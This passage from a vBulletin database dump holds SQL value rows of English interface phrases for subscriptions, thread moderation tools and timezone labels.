(38063, -1, 'transaction_details', 'subscription', 'Transaction Details', 'vbulletin', 'vBulletin Solutions', 1147204305, '3.6.0 Beta 1'),
(38064, -1, 'transaction_log', 'subscription', 'Transaction Log', 'vbulletin', 'vBulletin Solutions', 1147107789, '3.6.0 Beta 1'),
(38065, -1, 'transaction_lookup', 'subscription', 'Transaction Lookup', 'vbulletin', 'vBulletin Solutions', 1147107795, '3.6.0 Beta 1'),
(38066, -1, 'transaction_stats', 'subscription', 'Transaction Stats', 'vbulletin', 'vBulletin Solutions', 1147107781, '3.6.0 Beta 1'),
(38067, -1, 'transactionid', 'subscription', 'Transaction ID', 'vbulletin', 'vBulletin Solutions', 1146872009, '3.6.0 Beta 1'),
(38068, -1, 'twocheckout_prodid', 'subscription', '2CO ProdID', 'vbulletin', 'vBulletin Solutions', 1170440012, '3.6.5'),
(38069, -1, 'type', 'subscription', 'Type', 'vbulletin', 'vBulletin Solutions', 1146872016, '3.6.0 Beta 1'),
(38070, -1, 'us_dollars', 'subscription', 'U.S. Dollars', 'vbulletin', '', 0, ''),
(38071, -1, 'validity_periods_marked_indicate', 'subscription', 'Validity periods marked * indicate that purchasing this subscription is recurring, this means after the period is complete it will automatically be renewed.', 'vbulletin', '', 0, ''),
(38072, -1, 'view_users', 'subscription', 'View Users', 'vbulletin', '', 0, ''),
(38073, -1, 'worldpay_order_instructions', 'subscription', 'To pay for your subscription using WorldPay click the button below and follow the onscreen instructions.', 'vbulletin', '', 0, ''),
(38074, -1, 'x_subscription', 'subscription', '{1} Subscription', 'vbulletin', 'vBulletin Solutions', 1168864839, '3.6.5'),
(38075, -1, 'about_to_delete_post_edit_histories_in_forum_x_by_users', 'thread', 'You are about to delete all post edit histories in forum {1} by one of these users. Please select one:', 'vbulletin', '', 0, ''),
(38076, -1, 'about_to_delete_posts_in_forum_x_by_users', 'thread', 'You are about to delete all posts and threads in forum {1} by one of these users. Please select one:', 'vbulletin', '', 0, ''),
(38077, -1, 'add_tag', 'thread', 'Add Tag', 'vbulletin', 'vBulletin Solutions', 1190906634, '3.7.0 Beta 1'),
(38078, -1, 'are_you_sure_you_want_to_delete_these_subscriptions', 'thread', 'Are you sure you want to delete these Subscriptions?', 'vbulletin', '', 0, ''),
(38079, -1, 'attachments_awaiting_moderation', 'thread', 'Attachments Awaiting Moderation', 'vbulletin', '', 0, ''),
(38080, -1, 'date_options', 'thread', 'Date Options', 'vbulletin', '', 0, ''),
(38081, -1, 'date_range', 'thread', 'Date Range', 'vbulletin', '', 0, ''),
(38082, -1, 'delete_poll', 'thread', 'Delete Poll', 'vbulletin', '', 0, ''),
(38083, -1, 'deleted_by', 'thread', 'Deleted By', 'vbulletin', '', 0, ''),
(38084, -1, 'deleted_posts', 'thread', 'Deleted Posts', 'vbulletin', '', 0, ''),
(38085, -1, 'deleted_threads', 'thread', 'Deleted Threads', 'vbulletin', '', 0, ''),
(38086, -1, 'deleting_post_edit_histories', 'thread', 'Deleting Post Edit Histories', 'vbulletin', '', 0, ''),
(38087, -1, 'deleting_posts', 'thread', 'Deleting Posts', 'vbulletin', '', 0, ''),
(38088, -1, 'deleting_threads', 'thread', 'Deleting Threads', 'vbulletin', '', 0, ''),
(38089, -1, 'display_alphabetically', 'thread', 'Display Alphabetically', 'vbulletin', 'vBulletin Solutions', 1190906667, '3.7.0 Beta 1'),
(38090, -1, 'display_newest', 'thread', 'Display Newest', 'vbulletin', 'vBulletin Solutions', 1190906699, '3.7.0 Beta 1'),
(38091, -1, 'enter_the_threadid_of_the_thread', 'thread', 'Enter the threadid of the thread which contains the poll you wish to delete', 'vbulletin', '', 0, ''),
(38092, -1, 'enter_the_threadids_of_the_threads', 'thread', 'Enter the threadid(s) of the threads from which you want to unsubscribe users.(separate ids with spaces - eg: 1 2 6 9) ', 'vbulletin', '', 0, ''),
(38093, -1, 'events_awaiting_moderation', 'thread', 'Events Awaiting Moderation', 'vbulletin', '', 0, ''),
(38094, -1, 'include_child_forums', 'thread', 'Include Child Forums', 'vbulletin', '', 0, ''),
(38095, -1, 'last_post_date_is_at_least_xx_days_ago', 'thread', 'Last post date is at least X days ago', 'vbulletin', '', 0, ''),
(38096, -1, 'last_post_date_is_at_most_xx_days_ago', 'thread', 'Last post date is at most X days ago', 'vbulletin', '', 0, ''),
(38097, -1, 'last_post_edit_date_is_at_least_xx_days_ago', 'thread', 'Last post edit is at least X days old', 'vbulletin', 'vBulletin Solutions', 1219189822, '3.8.0 Alpha 1'),
(38098, -1, 'last_post_edit_date_is_at_most_xx_days_ago', 'thread', 'Last post edit is at most X days old', 'vbulletin', 'vBulletin Solutions', 1219189852, '3.8.0 Alpha 1'),
(38099, -1, 'last_post_in_thread_is_at_least_xx_days_ago', 'thread', 'Last post in thread is at least X days ago', 'vbulletin', '', 0, ''),
(38100, -1, 'last_post_in_thread_is_at_most_xx_days_ago', 'thread', 'Last post in thread is at most X days ago', 'vbulletin', '', 0, ''),
(38101, -1, 'move_all_threads', 'thread', 'Move All Threads', 'vbulletin', '', 0, ''),
(38102, -1, 'move_threads', 'thread', 'Move Threads', 'vbulletin', '', 0, ''),
(38103, -1, 'move_threads_selectively', 'thread', 'Move Threads Selectively', 'vbulletin', '', 0, ''),
(38104, -1, 'no_attachments_awaiting_moderation', 'thread', 'No Attachments awaiting moderation', 'vbulletin', '', 0, ''),
(38105, -1, 'no_events_awaiting_moderation', 'thread', 'No Events awaiting moderation', 'vbulletin', '', 0, ''),
(38106, -1, 'no_messages_awaiting_moderation', 'thread', 'No Messages Awaiting Moderation', 'vbulletin', 'vBulletin Solutions', 1191958105, '3.7.0 Beta 1'),
(38107, -1, 'no_posts_awaiting_moderation', 'thread', 'No Posts awaiting moderation', 'vbulletin', '', 0, ''),
(38108, -1, 'no_tags_defined', 'thread', 'No tags defined.', 'vbulletin', 'vBulletin Solutions', 1190906776, '3.7.0 Beta 1'),
(38109, -1, 'no_threads_awaiting_moderation', 'thread', 'No Threads awaiting moderation', 'vbulletin', '', 0, ''),
(38110, -1, 'note_leave_x_specify_no_limit', 'thread', '- Note: leave this at {1} to specify no limit.', 'vbulletin', '', 0, ''),
(38111, -1, 'notes', 'thread', 'Notes', 'vbulletin', '', 0, ''),
(38112, -1, 'order', 'thread', 'Order', 'vbulletin', '', 0, ''),
(38113, -1, 'original_post_date_is_at_least_xx_days_ago', 'thread', 'Original post date is at least X days ago', 'vbulletin', '', 0, ''),
(38114, -1, 'original_post_date_is_at_most_xx_days_ago', 'thread', 'Original post date is at most X days ago', 'vbulletin', '', 0, ''),
(38115, -1, 'other_options', 'thread', 'Other Options', 'vbulletin', '', 0, ''),
(38116, -1, 'poll_x_in_thread_y', 'thread', 'Poll \'{1}\' in thread \'{2}\'', 'vbulletin', '', 0, ''),
(38117, -1, 'posts_awaiting_moderation', 'thread', 'Posts Awaiting Moderation', 'vbulletin', '', 0, ''),
(38118, -1, 'prune_all_post_edit_histories', 'thread', 'Prune All Post Edit Histories', 'vbulletin', '', 0, ''),
(38119, -1, 'prune_all_threads', 'thread', 'Prune All Threads', 'vbulletin', '', 0, ''),
(38120, -1, 'prune_all_x_post_edit_histories_automatically', 'thread', 'Prune All of "{1}\'s" Posts Edit Histories Automatically', 'vbulletin', '', 0, ''),
(38121, -1, 'prune_all_x_posts_automatically', 'thread', 'Prune All of "{1}\'s" Posts Automatically', 'vbulletin', '', 0, ''),
(38122, -1, 'prune_by_username', 'thread', 'Prune by UsernameNote: This includes individual posts made by the specified user. ', 'vbulletin', '', 0, ''),
(38123, -1, 'prune_post_edit_history_manager', 'thread', 'Prune Post Edit History Manager', 'vbulletin', '', 0, ''),
(38124, -1, 'prune_posts', 'thread', 'Prune Posts', 'vbulletin', '', 0, ''),
(38125, -1, 'prune_threads', 'thread', 'Prune Threads', 'vbulletin', '', 0, ''),
(38126, -1, 'prune_threads_manager', 'thread', 'Prune Threads Manager', 'vbulletin', '', 0, ''),
(38127, -1, 'prune_threads_selectively', 'thread', 'Prune Threads Selectively', 'vbulletin', '', 0, ''),
(38128, -1, 'prune_x_posts_selectively', 'thread', 'Prune "{1}\'s" Posts Selectively', 'vbulletin', '', 0, ''),
(38129, -1, 'pruning_many_histories_is_a_server_intensive_process', 'thread', 'Pruning many post edit histories is a server intensive process because of the amount of data that must be removed. Use with care!', 'vbulletin', '', 0, ''),
(38130, -1, 'pruning_many_threads_is_a_server_intensive_process', 'thread', 'Pruning many threads is a server intensive process because of the amount of data that must be removed. Use with care!', 'vbulletin', '', 0, ''),
(38131, -1, 'status_options', 'thread', 'Status Options', 'vbulletin', '', 0, ''),
(38132, -1, 'tag_list', 'thread', 'Tag List', 'vbulletin', 'vBulletin Solutions', 1190906905, '3.7.0 Beta 1'),
(38133, -1, 'thread_has_at_least_xx_replies', 'thread', 'Thread has at Least X Replies', 'vbulletin', '', 0, ''),
(38134, -1, 'thread_has_at_least_xx_views', 'thread', 'Thread has at Least X Views', 'vbulletin', '', 0, ''),
(38135, -1, 'thread_has_at_most_xx_replies', 'thread', 'Thread has at Most X Replies', 'vbulletin', '', 0, ''),
(38136, -1, 'thread_has_at_most_xx_views', 'thread', 'Thread has at Most X Views', 'vbulletin', '', 0, ''),
(38137, -1, 'thread_manager', 'thread', 'Thread Manager', 'vbulletin', '', 0, ''),
(38138, -1, 'thread_title', 'thread', 'Thread Title', 'vbulletin', 'vBulletin Solutions', 1219189890, '3.8.0 Alpha 1'),
(38139, -1, 'threads_awaiting_moderation', 'thread', 'Threads Awaiting Moderation', 'vbulletin', '', 0, ''),
(38140, -1, 'unsubsribe_all_threads_from_specific_users', 'thread', 'Unsubscribe All Threads from Specific Users', 'vbulletin', '', 0, ''),
(38141, -1, 'unsubsribe_all_users_from_specific_threads', 'thread', 'Unsubscribe All Users from Specific Threads', 'vbulletin', '', 0, ''),
(38142, -1, 'updating_editlog', 'thread', 'Updating Editlog', 'vbulletin', '', 1218025415, ''),
(38143, -1, 'user_profile', 'thread', 'User Profile', 'vbulletin', 'vBulletin Solutions', 1191957904, '3.7.0 Beta 1'),
(38144, -1, 'username_leave_blank_to_remove_all', 'thread', 'User NameLeave this blank to remove ALL thread subscriptions. ', 'vbulletin', '', 0, ''),
(38145, -1, 'validate', 'thread', 'Validate', 'vbulletin', '', 0, ''),
(38146, -1, 'view_deleted_posts', 'thread', 'View Deleted Posts', 'vbulletin', '', 0, ''),
(38147, -1, 'view_options', 'thread', 'View Options', 'vbulletin', '', 0, ''),
(38148, -1, 'visitor_messages_awaiting_moderation', 'thread', 'Visitor Messages Awaiting Moderation', 'vbulletin', 'vBulletin Solutions', 1197370690, '3.7.0 Beta 1'),
(38149, -1, 'x_post_with_edit_history_matches_found', 'thread', '{1} Post With Edit History Matches Found', 'vbulletin', 'vBulletin Solutions', 1218718093, '3.8.0 Alpha 1'),
(38150, -1, 'x_subscriptions_matches_found', 'thread', '{1} Subscriptions Matches Found', 'vbulletin', '', 0, ''),
(38151, -1, 'x_thread_matches_found', 'thread', '{1} Thread Matches Found', 'vbulletin', '', 0, ''),
(38152, -1, 'any', 'threadmanage', 'Any', 'vbulletin', '', 0, ''),
(38153, -1, 'approved_attachment', 'threadmanage', 'Approved Attachment', 'vbulletin', '', 0, ''),
(38154, -1, 'approved_post', 'threadmanage', 'Approved Post', 'vbulletin', '', 0, ''),
(38155, -1, 'approved_thread', 'threadmanage', 'Approved Thread', 'vbulletin', '', 0, ''),
(38156, -1, 'attachment_removed', 'threadmanage', 'Attachment Removed', 'vbulletin', '', 0, ''),
(38157, -1, 'attachment_uploaded', 'threadmanage', 'Attachment Uploaded', 'vbulletin', '', 0, ''),
(38158, -1, 'awaiting_moderation', 'threadmanage', 'Awaiting Moderation', 'vbulletin', '', 0, ''),
(38159, -1, 'category', 'threadmanage', 'Category', 'vbulletin', '', 0, ''),
(38160, -1, 'change_expiring_time', 'threadmanage', 'Change Expiring Time From Now', 'vbulletin', 'vBulletin Solutions', 1151538239, '3.6.0 Beta 4'),
(38161, -1, 'change_to_expiring_redirect', 'threadmanage', 'Change to Expiring Redirect', 'vbulletin', 'vBulletin Solutions', 1151533043, '3.6.0 Beta 4'),
(38162, -1, 'change_to_permanent_redirect', 'threadmanage', 'Change to Permanent Redirect', 'vbulletin', 'vBulletin Solutions', 1151532839, '3.6.0 Beta 4'),
(38163, -1, 'child_posts', 'threadmanage', 'Child Posts', 'vbulletin', '', 0, ''),
(38164, -1, 'closed', 'threadmanage', 'Closed', 'vbulletin', '', 0, ''),
(38165, -1, 'copy_posts_note', 'threadmanage', 'Use the field below to specify the URL of the thread that the selected posts are to be copied into. Note that the copied posts will be inserted into their chronological positions within this thread.', 'vbulletin', 'vBulletin Solutions', 1212659739, '3.8.0 Alpha 1'),
(38166, -1, 'copy_posts_to_existing_thread', 'threadmanage', 'Copy Posts to Existing Thread', 'vbulletin', 'vBulletin Solutions', 1145568949, '3.6.0 Beta 1'),
(38167, -1, 'copy_posts_to_new_thread', 'threadmanage', 'Copy Posts to New Thread', 'vbulletin', 'vBulletin Solutions', 1145568902, '3.6.0 Beta 1'),
(38168, -1, 'copy_thread', 'threadmanage', 'Copy Thread', 'vbulletin', 'vBulletin Solutions', 1151447307, '3.6.0 Beta 4'),
(38169, -1, 'copying_x_posts_from_y_threads_in_z_forums', 'threadmanage', 'Copying {1} post(s) from {2} thread(s) in {3} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509054, '3.6.0 Beta 3'),
(38170, -1, 'delete_message', 'threadmanage', 'Delete Message', 'vbulletin', '', 0, ''),
(38171, -1, 'deleted', 'threadmanage', 'Deleted', 'vbulletin', '', 0, ''),
(38172, -1, 'deleted_thread', 'threadmanage', 'Deleted Thread', 'vbulletin', '', 0, ''),
(38173, -1, 'deleting_x_posts_from_y_threads_in_z_forums', 'threadmanage', 'Deleting {1} post(s) from {2} thread(s) in {3} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509176, '3.6.0 Beta 3'),
(38174, -1, 'deleting_x_threads_from_y_forums', 'threadmanage', 'Deleting {1} thread(s) from {2} forum(s).', 'vbulletin', '', 0, ''),
(38175, -1, 'deletion_options', 'threadmanage', 'Deletion Options', 'vbulletin', '', 0, ''),
(38176, -1, 'deletion_status', 'threadmanage', 'Deletion Status', 'vbulletin', '', 0, ''),
(38177, -1, 'deselect', 'threadmanage', 'Deselect', 'vbulletin', '', 0, ''),
(38178, -1, 'deselect_all_tags', 'threadmanage', 'Deselect All Tags', 'vbulletin', 'vBulletin Solutions', 1216725212, '3.8.0 Alpha 1'),
(38179, -1, 'destination_thread', 'threadmanage', 'Destination Thread', 'vbulletin', '', 0, ''),
(38180, -1, 'expires_in', 'threadmanage', 'Expires in', 'vbulletin', 'vBulletin Solutions', 1151447930, '3.6.0 Beta 4'),
(38181, -1, 'guests', 'threadmanage', 'Guests', 'vbulletin', '', 0, ''),
(38182, -1, 'how_would_you_like_to_delete', 'threadmanage', 'How would you like to delete?', 'vbulletin', '', 0, ''),
(38183, -1, 'item_deleted_would_you_like_to', 'threadmanage', 'This item has been \'deleted\'. Would you like to...', 'vbulletin', '', 0, ''),
(38184, -1, 'keep_attachments', 'threadmanage', 'Keep Attachments', 'vbulletin', '', 0, ''),
(38185, -1, 'leave_expiring_redirect', 'threadmanage', 'Leave Expiring Redirect', 'vbulletin', 'vBulletin Solutions', 1151525847, '3.6.0 Beta 4'),
(38186, -1, 'leave_it_deleted', 'threadmanage', 'Leave it deleted', 'vbulletin', '', 0, ''),
(38187, -1, 'leave_no_redirect', 'threadmanage', 'Leave No Redirect', 'vbulletin', 'vBulletin Solutions', 1151525821, '3.6.0 Beta 4'),
(38188, -1, 'leave_permanent_redirect', 'threadmanage', 'Leave Permanent Redirect', 'vbulletin', 'vBulletin Solutions', 1151525834, '3.6.0 Beta 4'),
(38189, -1, 'leave_redirects', 'threadmanage', 'Leave Redirects', 'vbulletin', '', 0, ''),
(38190, -1, 'link', 'threadmanage', 'Link', 'vbulletin', '', 0, ''),
(38191, -1, 'login_to_reauthenticate', 'threadmanage', 'Please login again to verify the legitimacy of this request.', 'vbulletin', 'vBulletin Solutions', 1194456201, '3.7.0 Beta 1'),
(38192, -1, 'manage_post', 'threadmanage', 'Manage Post', 'vbulletin', '', 0, ''),
(38193, -1, 'may_rename_thread', 'threadmanage', 'You may rename this thread if you wish.', 'vbulletin', '', 0, ''),
(38194, -1, 'merge', 'threadmanage', 'Merge', 'vbulletin', 'vBulletin Solutions', 1216734887, '3.8.0 Alpha 1'),
(38195, -1, 'merge_rename_selected', 'threadmanage', 'Merge/Rename Selected', 'vbulletin', 'vBulletin Solutions', 1216725167, '3.8.0 Alpha 1'),
(38196, -1, 'merge_tags', 'threadmanage', 'Merge Tags', 'vbulletin', 'vBulletin Solutions', 1216734601, '3.8.0 Alpha 1'),
(38197, -1, 'merge_threads', 'threadmanage', 'Merge Threads', 'vbulletin', '', 0, ''),
(38198, -1, 'merging_x_posts_from_y_threads_in_z_forums', 'threadmanage', 'Merging {1} post(s) from {2} thread(s) in {3} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509080, '3.6.0 Beta 3'),
(38199, -1, 'merging_x_threads_from_y_forums', 'threadmanage', 'Merging {1} thread(s) from {2} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509091, '3.6.0 Beta 3'),
(38200, -1, 'moderated_thread', 'threadmanage', 'Moderated Thread', 'vbulletin', '', 0, ''),
(38201, -1, 'moderator_log', 'threadmanage', 'Moderator Log', 'vbulletin', '', 0, ''),
(38202, -1, 'moderator_notes', 'threadmanage', 'Moderator Notes', 'vbulletin', '', 0, ''),
(38203, -1, 'move_posts_note', 'threadmanage', 'Use the field below to specify the URL of the thread that the selected posts are to be merged into. Note that all posts will be inserted into their chronological positions within this thread.', 'vbulletin', 'vBulletin Solutions', 1206180389, '3.7.0 Release Candidate 2'),
(38204, -1, 'move_posts_to_existing_thread', 'threadmanage', 'Move Posts to Existing Thread', 'vbulletin', '', 0, ''),
(38205, -1, 'move_posts_to_new_thread', 'threadmanage', 'Move Posts to New Thread', 'vbulletin', '', 0, ''),
(38206, -1, 'move_thread', 'threadmanage', 'Move Thread', 'vbulletin', 'vBulletin Solutions', 1151447733, '3.6.0 Beta 4'),
(38207, -1, 'moving_moderated_and_soft_deleted_threads', 'threadmanage', 'Moving moderated and soft deleted threads will not leave redirects.', 'vbulletin', '', 0, ''),
(38208, -1, 'moving_x_posts_from_y_threads_in_z_forums', 'threadmanage', 'Moving {1} post(s) from {2} thread(s) in {3} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509104, '3.6.0 Beta 3'),
(38209, -1, 'moving_x_threads_from_y_forums', 'threadmanage', 'Moving {1} thread(s) from {2} forum(s).', 'vbulletin', 'vBulletin Solutions', 1150509115, '3.6.0 Beta 3'),
(38210, -1, 'new_subject', 'threadmanage', 'New Subject', 'vbulletin', '', 0, ''),
(38211, -1, 'new_tag', 'threadmanage', 'New Tag', 'vbulletin', 'vBulletin Solutions', 1216734810, '3.8.0 Alpha 1'),
(38212, -1, 'new_thread_details', 'threadmanage', 'New Thread Details', 'vbulletin', '', 0, ''),
(38213, -1, 'no_posting', 'threadmanage', 'No Posting', 'vbulletin', '', 0, ''),
(38214, -1, 'normal_thread', 'threadmanage', 'Normal Thread', 'vbulletin', '', 0, ''),
(38215, -1, 'not_redirect', 'threadmanage', 'Not Redirect', 'vbulletin', '', 0, ''),
(38216, -1, 'notes', 'threadmanage', 'Notes', 'vbulletin', '', 0, ''),
(38217, -1, 'open', 'threadmanage', 'Open', 'vbulletin', '', 0, ''),
(38218, -1, 'opened', 'threadmanage', 'Opened', 'vbulletin', '', 0, ''),
(38219, -1, 'opened_thread', 'threadmanage', 'Opened Thread', 'vbulletin', '', 0, ''),
(38220, -1, 'physically_remove', 'threadmanage', 'Physically remove', 'vbulletin', '', 0, ''),
(38221, -1, 'physically_remove_message', 'threadmanage', 'Physically Remove Message', 'vbulletin', '', 0, ''),
(38222, -1, 'poll_edited', 'threadmanage', 'Poll Edited', 'vbulletin', '', 0, ''),
(38223, -1, 'polls', 'threadmanage', 'Polls', 'vbulletin', 'vBulletin Solutions', 1156285658, '3.6.1'),
(38224, -1, 'post_merged_from_multiple_posts', 'threadmanage', 'Post merged from multiple posts', 'vbulletin', '', 0, ''),
(38225, -1, 'post_x_by_y_removed', 'threadmanage', 'Post {1} by {2} Removed', 'vbulletin', '', 0, ''),
(38226, -1, 'post_x_by_y_softdeleted', 'threadmanage', 'Post {1} by {2} Soft Deleted', 'vbulletin', '', 0, ''),
(38227, -1, 'post_x_edited', 'threadmanage', 'Post {1} Edited', 'vbulletin', '', 0, ''),
(38228, -1, 'post_y_by_x_undeleted', 'threadmanage', 'Post {1} by {2} Undeleted', 'vbulletin', '', 0, ''),
(38229, -1, 'posts_copied_to_x', 'threadmanage', 'Posts copied to threadid {1}', 'vbulletin', 'vBulletin Solutions', 1145643031, '3.6.0 Beta 1'),
(38230, -1, 'posts_moved_to_new_thread', 'threadmanage', 'All the posts you selected on this page will be moved into a new thread, the details of which you must specify here.', 'vbulletin', '', 0, ''),
(38231, -1, 'reason_for_deletion', 'threadmanage', 'Reason for Deletion (optional)', 'vbulletin', '', 0, ''),
(38232, -1, 'redirect_title', 'threadmanage', 'Redirect Title', 'vbulletin', 'vBulletin Solutions', 1156347611, '3.6.1'),
(38233, -1, 'select', 'threadmanage', 'Select', 'vbulletin', '', 0, ''),
(38234, -1, 'soft_delete_leave_deleted_message', 'threadmanage', '\'Soft\' delete - Leave "Deleted" Message', 'vbulletin', '', 0, ''),
(38235, -1, 'split', 'threadmanage', 'Split', 'vbulletin', '', 0, ''),
(38236, -1, 'split_thread', 'threadmanage', 'Split Thread', 'vbulletin', '', 0, ''),
(38237, -1, 'stuck', 'threadmanage', 'Stuck', 'vbulletin', '', 0, ''),
(38238, -1, 'stuck_thread', 'threadmanage', 'Stuck Thread', 'vbulletin', '', 0, ''),
(38239, -1, 'tag_merge_description', 'threadmanage', 'The tag(s) listed below will be merged with the new tag that you specify. The old tags will be deleted and threads will be updated to use the new tag. If the new tag does not already exist, it will be created.', 'vbulletin', 'vBulletin Solutions', 1216735124, '3.8.0 Alpha 1'),
(38240, -1, 'this_redirect_expires_on_x_at_y', 'threadmanage', 'This redirect expires on {1} at {2}', 'vbulletin', 'vBulletin Solutions', 1151527945, '3.6.0 Beta 4'),
(38241, -1, 'thread_closed', 'threadmanage', 'Closed', 'vbulletin', '', 0, ''),
(38242, -1, 'thread_contain_one_poll', 'threadmanage', 'Since there are multiple polls, please choose which poll to keep for the destination thread.', 'vbulletin', 'vBulletin Solutions', 1156286833, '3.6.1'),
(38243, -1, 'thread_copied_to_x', 'threadmanage', 'Thread copied to \'{1}\'.', 'vbulletin', '', 0, ''),
(38244, -1, 'thread_edited_visible_x_open_y_sticky_z', 'threadmanage', 'Thread edited. (visible: {1}; open: {2}; sticky: {3})', 'vbulletin', '', 0, ''),
(38245, -1, 'thread_is_open', 'threadmanage', 'Thread is open: Users can post in this thread', 'vbulletin', '', 0, ''),
(38246, -1, 'thread_is_sticky', 'threadmanage', 'Thread is sticky: Thread remains at top of list thread listings', 'vbulletin', '', 0, ''),
(38247, -1, 'thread_is_visible', 'threadmanage', 'Thread is visible: Un-check this box to send this thread to the moderation queue', 'vbulletin', '', 0, ''),
(38248, -1, 'thread_merged_from_multiple_threads', 'threadmanage', 'Thread merged from multiple threads', 'vbulletin', '', 0, ''),
(38249, -1, 'thread_merged_with_x', 'threadmanage', 'Thread merged with \'{1}\'.', 'vbulletin', '', 0, ''),
(38250, -1, 'thread_moved_to_x', 'threadmanage', 'Thread moved to \'{1}\'.', 'vbulletin', '', 0, ''),
(38251, -1, 'thread_moved_with_redirect_to_a', 'threadmanage', 'Thread moved with redirect to \'{1}\'.', 'vbulletin', '', 0, ''),
(38252, -1, 'thread_open', 'threadmanage', 'Open', 'vbulletin', '', 0, ''),
(38253, -1, 'thread_redirect_removed', 'threadmanage', 'Thread Redirect Removed', 'vbulletin', '', 0, ''),
(38254, -1, 'thread_redirects_can_not_be_merged', 'threadmanage', 'Thread redirects cannot be merged.\r\n', 'vbulletin', '', 0, ''),
(38255, -1, 'thread_removed', 'threadmanage', 'Thread Removed', 'vbulletin', '', 0, ''),
(38256, -1, 'thread_softdeleted', 'threadmanage', 'Thread Soft Deleted', 'vbulletin', '', 0, ''),
(38257, -1, 'thread_split_from_threadid_a_by_b_on_x_at_d', 'threadmanage', 'Thread split from threadid {1} by {2} on {3} at {4}.', 'vbulletin', '', 0, ''),
(38258, -1, 'thread_split_to_x', 'threadmanage', 'Thread split to threadid {1}.', 'vbulletin', '', 0, ''),
(38259, -1, 'thread_state', 'threadmanage', 'Thread State', 'vbulletin', '', 0, ''),
(38260, -1, 'thread_status', 'threadmanage', 'Thread Status', 'vbulletin', '', 0, ''),
(38261, -1, 'thread_summary', 'threadmanage', 'Thread Summary', 'vbulletin', '', 0, ''),
(38262, -1, 'thread_title_x_changed', 'threadmanage', 'Thread title (original \'{1}\') changed', 'vbulletin', '', 0, ''),
(38263, -1, 'thread_undeleted', 'threadmanage', 'Thread Undeleted', 'vbulletin', '', 0, ''),
(38264, -1, 'thread_x_by_y_removed', 'threadmanage', 'Thread {1} by {2} Removed', 'vbulletin', '', 0, ''),
(38265, -1, 'unapproved_attachment', 'threadmanage', 'Unapproved Attachment', 'vbulletin', '', 0, ''),
(38266, -1, 'unapproved_post', 'threadmanage', 'Unapproved Post', 'vbulletin', '', 0, ''),
(38267, -1, 'unapproved_thread', 'threadmanage', 'Unapproved Thread', 'vbulletin', '', 0, ''),
(38268, -1, 'undelete_it_restore', 'threadmanage', 'Undelete it (restore)', 'vbulletin', '', 0, ''),
(38269, -1, 'unstuck', 'threadmanage', 'Unstuck', 'vbulletin', '', 0, ''),
(38270, -1, 'unstuck_thread', 'threadmanage', 'Unstuck Thread', 'vbulletin', '', 0, ''),
(38271, -1, 'url_of_thread_to_be_merged', 'threadmanage', 'URL of Thread to be Merged', 'vbulletin', '', 0, ''),
(38272, -1, 'use_field_to_specify_url_to_combine', 'threadmanage', 'Use the field below to specify the URL of the thread that is to be combined with this one. \r\nYou may specify the merge options on the next screen.', 'vbulletin', 'vBulletin Solutions', 1199320816, '3.7.0 Beta 4'),
(38273, -1, 'visible', 'threadmanage', 'Visible', 'vbulletin', '', 0, ''),
(38274, -1, 'you_must_have_the_required_permission', 'threadmanage', 'You must have the required permission for this action in all forums from which you have selected threads or posts.', 'vbulletin', '', 0, ''),
(38275, -1, 'timezone_gmt_minus_0100', 'timezone', '(GMT -1:00 hour) Azores, Cape Verde Islands', 'vbulletin', '', 0, ''),
(38276, -1, 'timezone_gmt_minus_0200', 'timezone', '(GMT -2:00) Mid-Atlantic', 'vbulletin', '', 0, ''),
(38277, -1, 'timezone_gmt_minus_0300', 'timezone', '(GMT -3:00) Brazil, Buenos Aires, Georgetown', 'vbulletin', '', 0, ''),
(38278, -1, 'timezone_gmt_minus_0330', 'timezone', '(GMT -3:30) Newfoundland', 'vbulletin', '', 0, ''),
(38279, -1, 'timezone_gmt_minus_0400', 'timezone', '(GMT -4:00) Atlantic Time (Canada), La Paz, Santiago', 'vbulletin', 'vBulletin Solutions', 1201669054, '3.7.0 Beta 5'),
(38280, -1, 'timezone_gmt_minus_0430', 'timezone', '(GMT -4:30) Caracas', 'vbulletin', 'vBulletin Solutions', 1201669077, '3.7.0 Beta 5'),
(38281, -1, 'timezone_gmt_minus_0500', 'timezone', '(GMT -5:00) Eastern Time (US & Canada), Bogota, Lima', 'vbulletin', '', 0, ''),
(38282, -1, 'timezone_gmt_minus_0600', 'timezone', '(GMT -6:00) Central Time (US & Canada), Mexico City', 'vbulletin', '', 0, ''),
(38283, -1, 'timezone_gmt_minus_0700', 'timezone', '(GMT -7:00) Mountain Time (US & Canada)', 'vbulletin', '', 0, ''),
(38284, -1, 'timezone_gmt_minus_0800', 'timezone', '(GMT -8:00) Pacific Time (US & Canada)', 'vbulletin', '', 0, ''),
(38285, -1, 'timezone_gmt_minus_0900', 'timezone', '(GMT -9:00) Alaska', 'vbulletin', '', 0, ''),
(38286, -1, 'timezone_gmt_minus_1000', 'timezone', '(GMT -10:00) Hawaii', 'vbulletin', '', 0, ''),
(38287, -1, 'timezone_gmt_minus_1100', 'timezone', '(GMT -11:00) Midway Island, Samoa', 'vbulletin', '', 0, ''),
(38288, -1, 'timezone_gmt_minus_1200', 'timezone', '(GMT -12:00) Eniwetok, Kwajalein', 'vbulletin', '', 0, ''),
(38289, -1, 'timezone_gmt_plus_0000', 'timezone', '(GMT) Western Europe Time, London, Lisbon, Casablanca', 'vbulletin', '', 0, ''),
(38290, -1, 'timezone_gmt_plus_0100', 'timezone', '(GMT +1:00 hour) Brussels, Copenhagen, Madrid, Paris', 'vbulletin', '', 0, ''),
(38291, -1, 'timezone_gmt_plus_0200', 'timezone', '(GMT +2:00) Kaliningrad, South Africa, Cairo', 'vbulletin', 'vBulletin Solutions', 1265286660, '3.8.5'),
(38292, -1, 'timezone_gmt_plus_0300', 'timezone', '(GMT +3:00) Baghdad, Riyadh, Moscow, St. Petersburg', 'vbulletin', '', 0, ''),
(38293, -1, 'timezone_gmt_plus_0330', 'timezone', '(GMT +3:30) Tehran', 'vbulletin', '', 0, ''),
(38294, -1, 'timezone_gmt_plus_0400', 'timezone', '(GMT +4:00) Abu Dhabi, Muscat, Baku, Tbilisi', 'vbulletin', '', 0, ''),
(38295, -1, 'timezone_gmt_plus_0430', 'timezone', '(GMT +4:30) Kabul', 'vbulletin', '', 0, ''),
